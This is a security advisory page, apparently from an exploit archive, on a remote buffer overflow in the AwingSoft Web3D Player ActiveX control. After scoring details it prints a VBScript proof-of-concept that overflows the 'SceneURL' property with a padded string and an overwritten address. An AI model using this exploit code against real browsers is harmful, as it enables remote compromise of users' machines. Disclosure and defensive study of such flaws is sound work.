AwingSoft Web3D Player (WindsPly.ocx) "SceneURL()" Remote Buffer Overflow

Credit: shinnai
Risk: High
Local: No
Remote: Yes
CWE: CWE-119

CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

----------------------------------------------------------------------------- AwingSoft Web3D Player (WindsPly.ocx) "SceneURL()" Remote Buffer Overflow url: Author: shinnai mail: shinnai[at]autistici[dot]org site: Dedicated to aaannamariaaa :D This was written for educational purpose. Use it at your own risk. Author will be not responsible for any damage. File: WindsPly.ocx Ver.: <= GUID: {17A54E7D-A9D4-11D8-9552-00E04CB09903} ProgID: WindsPlayerIE.View.1 Marked as: RegKey Safe for Script: Falso RegKey Safe for Init: Falso Implements IObjectSafety: Vero IDisp Safe: Safe for untrusted: caller,data IPersist Safe: Safe for untrusted: caller,data IPStorage Safe: Safe for untrusted: caller,data Tested on Windows XP Professional SP3 all patched, with Internet Explorer 8 ----------------------------------------------------------------------------- <object classid='clsid:17A54E7D-A9D4-11D8-9552-00E04CB09903' id='test'></object> <script language='vbscript'> buff = String(8704, "A") mReg = unescape("bbbb") mExc = unescape("%00%00%01%00") 'Memory address: 00010000 Access: RW buf1 = String(88, "c") buf2 = String(47284, "D") test.SceneURL = buff + mReg + mExc + buf1 + buf2 </script>


Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022,


Back to Top